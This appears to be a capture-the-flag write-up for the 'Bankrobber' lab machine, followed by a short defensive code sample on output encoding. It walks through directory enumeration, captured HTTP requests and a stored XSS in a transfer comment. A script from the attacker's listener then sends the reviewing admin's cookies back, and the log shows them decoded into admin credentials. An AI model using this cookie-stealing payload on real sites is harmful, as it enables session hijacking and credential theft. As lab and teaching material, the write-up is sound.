2 :80 :443 XSS > admin

http://bankrobber.htb/
e-coin website

$ gobuster dir -u http://bankrobber.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/img                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/img/]
/register.php         (Status: 200) [Size: 0]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 8245]
/user                 (Status: 301) [Size: 339] [--> http://bankrobber.htb/user/]
/admin                (Status: 301) [Size: 340] [--> http://bankrobber.htb/admin/]
/link.php             (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/css/]
/js                   (Status: 301) [Size: 337] [--> http://bankrobber.htb/js/]
/examples             (Status: 503) [Size: 1060]
/generic.html         (Status: 200) [Size: 13343]
/notes.txt            (Status: 200) [Size: 133]
/logout.php           (Status: 302) [Size: 0] [--> index.php?msg=Succesfully logged out]
/elements.html        (Status: 200) [Size: 34812]
/licenses             (Status: 403) [Size: 1205]
/fonts                (Status: 301) [Size: 340] [--> http://bankrobber.htb/fonts/]
/phpmyadmin           (Status: 403) [Size: 1205]
/webalizer            (Status: 403) [Size: 1046]

http://bankrobber.htb/admin/
You're not authorized to view this page

http://bankrobber.htb/generic.html
Similar website (old); links not working.

http://bankrobber.htb/notes.txt
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

# login page is on the index.php itself
# sends POST request 
# default creds admin:admin; nothing happens

# register is also on index.php
# sends POST request
# response
http://bankrobber.htb/index.php?msg=User%20created.

# login as kashz:kashz
POST /login.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://bankrobber.htb
DNT: 1
Connection: close
Referer: http://bankrobber.htb/index.php?msg=User%20created.
Upgrade-Insecure-Requests: 1

username=kashz&password=kashz&pounds=Submit+Query

# fetches /user/
GET /user/ HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/index.php?msg=User%20created.
DNT: 1
Connection: close
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
Upgrade-Insecure-Requests: 1

# cookie is just b64.
# interesting js file is requested
GET /js/transfer.js HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bankrobber.htb/user/
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D

# transfer.js
//Start user functions
function transferEcoin(fromId,toId,amount,comment){
	var http = new XMLHttpRequest();
	var url = 'transfer.php';
	var params = 'fromId='+fromId+'&toId='+toId+'&amount='+amount+'&comment='+comment;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}

function getVal(id){
		return document.getElementById(id).value;
}

function getData(){
	fromId = getVal("fromId");
	toId = getVal("toId");
	amount = getVal("amount");
	comment = getVal("comment");
	transferEcoin(fromId,toId,amount,comment);
	alert('Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.');
}
// End user function
// Start admin functions
function handleTransaction(status,id,from,to,amount){
	var http = new XMLHttpRequest();
	var url = 'handle.php';
	var params = 'status='+status+'&id='+id+'&from='+from+'&to='+to+'&amount='+amount;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}
// End admin functions

# can't find the handle.php code.

$ gobuster dir -u http://bankrobber.htb/user -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php            (Status: 200) [Size: 39]
/auth.php             (Status: 200) [Size: 39]
/transfer.php         (Status: 200) [Size: 39]

# nothing here
# no vhosts

# exploring transfer e-coin
POST /user/transfer.php HTTP/1.1
Host: bankrobber.htb
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://bankrobber.htb
Dnt: 1
Referer: https://bankrobber.htb/user/
Te: trailers
Connection: close

fromId=8&toId=2&amount=10&comment=test
# then comes a popup
Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.

# as admin will review our transaction, maybe we can request a callback
# tried links, nothing

Trying XSS

<script src="http://10.10.16.7/"></script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:23:58] "GET / HTTP/1.1" 200 -

# we do get a callback
# tried using PayloadAllTheThings/XSS - was getting nothing.
# simple way - requested a .js file and executed it on server

# requesting .js file
<script src='http://10.10.16.7/kashz.js'> </script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:30:38] code 404, message File not found
10.10.10.154 - - [30/Sep/2021 15:30:38] "GET /kashz.js HTTP/1.1" 404 -

# file: kashz.js (listener is 10.10.16.7 as above; the path matches the callback seen in the server log below)
// Load an image from the listener so the reviewing admin's browser sends document.cookie in the URL.
function cookie1() {
    var img = document.createElement("img");
    img.src = "http://10.10.16.7/cookie?=" + document.cookie;
    document.body.appendChild(img);
}
cookie1(); // the function has to be invoked when the script loads, otherwise nothing is sent

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:35:58] "GET /kashz.js HTTP/1.1" 200 -
10.10.10.154 - - [30/Sep/2021 15:35:59] "GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

# url-decode
GET /cookie?=username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1 HTTP/1.1 404
# base64 -d
admin:Hopelessromantic
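# added example (not code from the box or this writeup): the transfer comment is rendered into the admin review page, and notes.txt says comments are encoded "for every IP address except localhost". Assuming that check keys on the address of the request being served (the writeup only shows the payload firing when the box itself fetched kashz.js), this contrasts the conditional encoding with the unconditional output encoding a fix needs; function names and the sample input are constructed.

```javascript
// HTML-entity encode the characters that can break out of a text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Weak (models the notes.txt behaviour, an assumption): encoding is skipped
// when the request comes from localhost. The admin reviewing transfers on the
// box itself therefore gets the raw comment, and the stored payload executes
// in the admin's browser with the admin's cookies in scope.
function renderCommentWeak(comment, requestAddr) {
  const body = requestAddr === "127.0.0.1" ? comment : escapeHtml(comment);
  return `<td class="comment">${body}</td>`;
}

// Hardened: encode at the output point every time, independent of who asks.
function renderCommentSafe(comment) {
  return `<td class="comment">${escapeHtml(comment)}</td>`;
}

// Detection helper for the demo: does the rendered cell still carry a live script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the comment the writeup submitted to transfer.php.
const PAYLOAD = "<script src='http://10.10.16.7/kashz.js'> </script>";

// Run the three cases and report whether the script element survives rendering.
function demo() {
  return {
    weakRemote: containsScriptTag(renderCommentWeak(PAYLOAD, "10.10.16.7")), // false: encoded
    weakLocal: containsScriptTag(renderCommentWeak(PAYLOAD, "127.0.0.1")),    // true: fires for the admin
    safeLocal: containsScriptTag(renderCommentSafe(PAYLOAD)),                 // false: always encoded
  };
}

console.log(demo());
```

The cookie values exfiltrated above (username and password readable from document.cookie) also show the session cookies lack HttpOnly; output encoding stops the injection, HttpOnly limits what a successful one can read.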
